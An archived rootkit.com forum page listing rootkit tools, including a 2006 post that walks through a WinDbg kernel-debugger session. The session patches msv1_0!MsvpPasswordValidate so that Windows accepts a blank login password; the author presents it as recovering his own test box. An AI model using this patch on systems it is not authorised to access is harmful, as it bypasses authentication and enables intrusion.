rootkit.com

main menu

home

forums
Show me new threads!

bookmarks

post article

view blogs

vault

you must be level 2 to upload files to your vault

downloads

you must be logged to access downloads

Rootkit Collection

File	Contributer	Link
Hacker Def...	hf	n/a
HE4Hook	admin	n/a
BASIC CLAS...	hoglund	n/a
Vanquish	xshadow	n/a
NT Rootkit	hoglund	n/a
FU	fuzen_op	n/a
WinlogonHi...	JeFFOsZ	n/a
klister	joanna	n/a
Patchfinde...	joanna	n/a
MyNetwork	hoglund	n/a
MTDWin	hoglund	n/a
NTFSHider	hoglund	n/a
VideoCardK...	hoglund	n/a
VICE	fuzen_op	n/a
Klog	Clandestin...	n/a
NtIllusion	Kdm	n/a
AFX Rootki...	TheRealAph...	n/a
SInAR	vulndev	n/a
Shadow Wal...	Clandestin...	n/a
BootRootki...	dereksoede...	n/a
CHAZ - Nim...	neocrackr	n/a
Clandestin...	merlvingia...	n/a
FUTo	petersilbe...	n/a
Windows Me...	alcapone66...	n/a
RAIDE	petersilbe...	n/a
BOOT KIT	vipinkumar	n/a
BluePill	Joanna and...	n/a
DEFRAG	blume1975	n/a
Keyboard H...	chpie	n/a
CheatEngin...	DarkByte	n/a

backends
A news back-end to implement RootKit news into your website is here or more advanced version here.

An XML/RSS feed that includes both NEWS and BLOGS for RootKit is here: XML/RSS.

Beta feed for replied posts here. feedback to admins not forums, we know about times being off...

Bypassing your testbox's login password
Aug 10 2006, 16:21 (UTC+0)

bugcheck writes: After living out of a duffle bang for 2 months now i've finally got all my stuff back and have settled into a new apartment and finally have dev PC's again, W00h00! So this isnt the first have had to do this to recover an install with a forgotten password but figured id share it incase you are able to take advantage of it (thx to a friend for pointing out what function did the trick). As stupid as I am I always pick those unique but easy to remember passwords that of course ill never forget, use it once and shelf the image for months at a time and then of course, forget it. In my case today its my dev box!!! Luckly i had been using it as a test machine when i first got it so i happened to already have a boot.ini entry to kernel debug on 1394 and of course had my laptop handy. I know there are better ways to recover a forgotten password but of course its not as cool as this! =P It doesnt reset it but at least you can log in again...

Happy debugging,
Chris

kd> !process 0 0 winlogon.exe
PROCESS 817bb978 SessionId: 0 Cid: 0260 Peb: 7ffdc000 ParentCid: 0168
DirBase: 05e40060 ObjectTable: e148a858 HandleCount: 455.
Image: winlogon.exe

kd> .process /p /r 817bb978
Implicit process is now 817bb978
.cache forcedecodeuser done
Loading User Symbols
...................................................
kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 ?? ???
^ Memory access error in 'u msv1_0!MsvpPasswordValidate l3'

kd> .pagein msv1_0!MsvpPasswordValidate
You need to continue execution (press 'g' <enter>) for the pagein to be brought in. When the debugger breaks in again, the page will be present.

kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
80526da8 cc int 3

kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 8bff mov edi,edi
77c79929 55 push ebp
77c7992a 8bec mov ebp,esp

kd> eq msv1_0!MsvpPasswordValidate cccc000cc201b0

kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 b001 mov al,0x1
77c79929 c20c00 ret 0xc
77c7992c cc int 3

kd> ** YOU CAN NOW LOGIN WITH A BLANK PASSWORD!
kd> ** DONT BE SCREWIN WITH YOUR CO-WORKERS NOW =p

kd> g

read comments (5) / write comment

recent comments:
possibility to erase it on-disk toto22 13.Aug:11:26
woohoo2 rossettoecioccolato 11.Aug:06:34
woohoo ! MohammadHosein 10.Aug:21:33

printer-friendly version

ROOTKITS, Subverting the Windows Kernel
By: Greg Hoglund and Jamie Butler

Rootkits are powerful tools to compromise computer systems without detection. Get the original and best book on the subject here.

logged users

active for last 5 minutes

registered users:79912

There are currently 0 registered users and 21 guests browsing the website.

Welcome our latest registered user: Pris

recent board posts
subject author date
Hiding Tcp... _MAX_ Jul / 27
unload dri... dubteam2000 Jul / 26
APC Delive... aall87 Jul / 21
x64 SSDT h... lolwurst Jul / 21
password r... markedu9 Jul / 19
How to hid... Hack4freedom Jul / 15
UNC PATH A... pain_abator Jul / 15
CALL in na... _MAX_ Jul / 13
Conflict b... _MAX_ Jul / 08
Making dev... blackd0t Jul / 06
Hide proce... l0ngshot Jul / 01
Process Ha... krzys Jul / 01
Rooting VP... simplicityx Jun / 24
Rootkits: ... chimai Jun / 24
NDIS Inter... lclee_vx Jun / 17

recently replied posts
subject author date
x64 SSDT h... vrtulex Jul/27
unload dri... EreTIk Jul/27
Hiding Tcp... _MAX_ Jul/27
BIOS Rootk... rossettoecioccolato Jul/25
about this... DiabloNova Jul/22
APC Delive... aall87 Jul/21
password r... markedu9 Jul/19
UNC PATH A... pain_abator Jul/19
How to hid... vrtulex Jul/16
CALL in na... _MAX_ Jul/16
Hide proce... vrtulex Jul/10
Conflict b... _MAX_ Jul/08
Making dev... blackd0t Jul/07

recent blog entries
DiabloNova Jul 31, 12:06
ghost1369 May 09, 04:30
DiabloNova May 08, 15:33
_4epen May 04, 15:42
DiabloNova May 02, 03:59

Best Screenshots / Analog
May 14, 2010
dep.png /
click on the picture to enlarge and see description
!
read comments (0)
write comment
view archive(90) :
Analog(53) / Best Screenshots(37)
submit a picture to gallery

the most active news users
based on the number of news posts for last 30 days

user nr. of posted news

select skin

Truth is what stands the test of experience.